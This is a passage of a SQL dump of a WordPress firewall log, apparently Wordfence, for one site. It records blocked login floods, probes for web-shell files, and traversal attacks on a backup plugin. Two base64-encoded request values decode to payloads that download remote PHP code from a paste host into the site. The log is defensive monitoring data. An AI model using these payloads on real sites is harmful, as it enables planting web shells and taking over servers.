User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3R3ZW50eWZpdmUvaW5jbHVkZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(14292,1704548372.756722,1704548372.657500,'\0\0\0\0\0\0\0\0\0\0[\\:',0,403,0,0,0,'https://tummyrevolution.com/wp-content/style.php?sig=rename',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvc3R5bGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(14298,0.000000,1704551958.076038,'\0\0\0\0\0\0\0\0\0\0k',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14293,1704548356.727593,1704548356.637200,'\0\0\0\0\0\0\0\0\0\0[\\:',0,403,0,0,0,'https://tummyrevolution.com/wp-includes/style.php?sig=rename',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(14367,0.000000,1704602279.773182,'\0\0\0\0\0\0\0\0\0\0gx',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14294,1704548347.865102,1704548347.762400,'\0\0\0\0\0\0\0\0\0\0[\\:',0,403,0,0,0,'https://tummyrevolution.com/style.php?sig=rename',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(14205,1704500794.760017,1704500794.702900,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/wp-content/plugins/backup-backup/includes/backup-heart.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','blocked:waf','Directory Traversal','{\"learningMode\":0,\"failedRules\":\"12\",\"paramKey\":\"cmVxdWVzdC5ib2R5WzFd\",\"paramValue\":\"Y3VybCAtbyAuLi8uLi8uLi8uLi93cC14bmJyLnBocCBodHRwczovL3JlbnRyeS5jby9tNW43d2UvcmF3\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9iYWNrdXAtYmFja3VwL2luY2x1ZGVzL2JhY2t1cC1oZWFydC5waHA=\",\"category\":\"traversal\",\"ssl\":1}'),(14296,0.000000,1704550541.732968,'\0\0\0\0\0\0\0\0\0\0^',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14297,1704551940.223126,1704551940.150300,' D\0A0ȳ',0,403,0,0,0,'https://tummyrevolution.com/wp-content/plugins/include.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pbmNsdWRlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(14295,0.000000,1704548867.277130,'\0\0\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14235,0.000000,1704512719.519999,'*\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14236,1704514256.785471,1704514256.709300,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/autoload_classmap.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2F1dG9sb2FkX2NsYXNzbWFwLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(14234,0.000000,1704511052.831066,'\0\0\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14233,1704510833.580849,1704510833.485900,' D\0A0ȳ',0,403,0,0,0,'https://tummyrevolution.com/cgi-bin/class_api.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NnaS1iaW4vY2xhc3NfYXBpLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(14245,1704517594.946691,1704517594.877600,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/elp.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2VscC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(14322,0.000000,1704570565.983568,'\0\0\0\0\0\0\0\0\0\0Kݫ',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14301,1704551983.515432,1704551983.433300,' D\0A0ȳ',0,403,0,0,0,'https://tummyrevolution.com/wp-content/plugins/WordPressCore/include.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9Xb3JkUHJlc3NDb3JlL2luY2x1ZGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(14232,1704510841.489969,1704510841.406800,' D\0A0ȳ',0,403,0,0,0,'https://tummyrevolution.com/wp-admin/images/class.api.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2ltYWdlcy9jbGFzcy5hcGkucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(14206,1704500789.943447,1704500789.834700,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/wp-content/plugins/backup-backup/includes/backup-heart.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','blocked:waf','Directory Traversal','{\"learningMode\":0,\"failedRules\":\"12\",\"paramKey\":\"cmVxdWVzdC5ib2R5W29d\",\"paramValue\":\"ZmlsZV9wdXRfY29udGVudHMoIi4uLy4uLy4uL3VwbG9hZHMvd3AtaHNrcy5waHAiLGZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwczovL3JlbnRyeS5jby9tNW43d2UvcmF3IikpOw==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9iYWNrdXAtYmFja3VwL2luY2x1ZGVzL2JhY2t1cC1oZWFydC5waHA=\",\"category\":\"traversal\",\"ssl\":1}'),(14237,1704514254.042025,1704514253.965200,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/gawean.PhP7','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2dhd2Vhbi5QaFA3\",\"category\":\"brute-force\",\"ssl\":1}'),(14231,1704510844.457432,1704510844.397600,' D\0A0ȳ',0,403,0,0,0,'https://tummyrevolution.com/woh.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dvaC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(14230,1704510846.234724,1704510846.149900,' D\0A0ȳ',0,403,0,0,0,'https://tummyrevolution.com/wp-admin/js/widgets/class.api.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2pzL3dpZGdldHMvY2xhc3MuYXBpLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(14244,1704517599.592786,1704517599.523900,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/gawean.PhP7','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2dhd2Vhbi5QaFA3\",\"category\":\"brute-force\",\"ssl\":1}'),(14238,1704514250.107649,1704514250.035100,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/elp.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2VscC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(14229,1704510846.958806,1704510846.877200,' D\0A0ȳ',0,403,0,0,0,'https://tummyrevolution.com/component-init.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NvbXBvbmVudC1pbml0LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(14320,0.000000,1704567887.605214,'\0\0\0\0\0\0\0\0\0\0-=E',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14321,0.000000,1704569014.797052,'\0\0\0\0\0\0\0\0\0\0WE',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14228,1704510851.938015,1704510851.858300,' D\0A0ȳ',0,403,0,0,0,'https://tummyrevolution.com/class_api.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NsYXNzX2FwaS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(14319,0.000000,1704567827.529299,'\0\0\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14302,1704551960.596965,1704551960.541800,' D\0A0ȳ',0,403,0,0,0,'https://tummyrevolution.com/wp-content/themes/include.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL2luY2x1ZGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(14239,1704514244.269899,1704514244.157200,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/chosen.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Nob3Nlbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(14227,1704510854.572019,1704510854.470200,' D\0A0ȳ',0,403,0,0,0,'https://tummyrevolution.com/fox.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2ZveC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(15598,0.000000,1704965245.413235,'\0\0\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15592,0.000000,1704960847.460726,'\0\0\0\0\0\0\0\0\0\0F=',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15593,0.000000,1704961327.427600,'\0\0\0\0\0\0\0\0\0\03[<',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15594,0.000000,1704962035.266111,' |!\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15595,0.000000,1704963037.643869,'\0\0\0\0\0\0\0\0\0\0\\J',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15596,0.000000,1704964718.989893,' A\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15597,0.000000,1704964762.608355,'$\0\0830\06',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15591,1704960004.274848,1704960004.181600,'\0\0\0\0\0\0\0\0\0\0[\\',0,403,0,0,0,'https://www.tummyrevolution.com/style.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(15588,0.000000,1704957851.040734,'\0\0\0\0\0\0\0\0\0\0k',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15589,0.000000,1704959460.900846,'\0\0\0\0\0\0\0\0\0\02p',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0','blocked:wfsn','Blocked by Wordfence Security 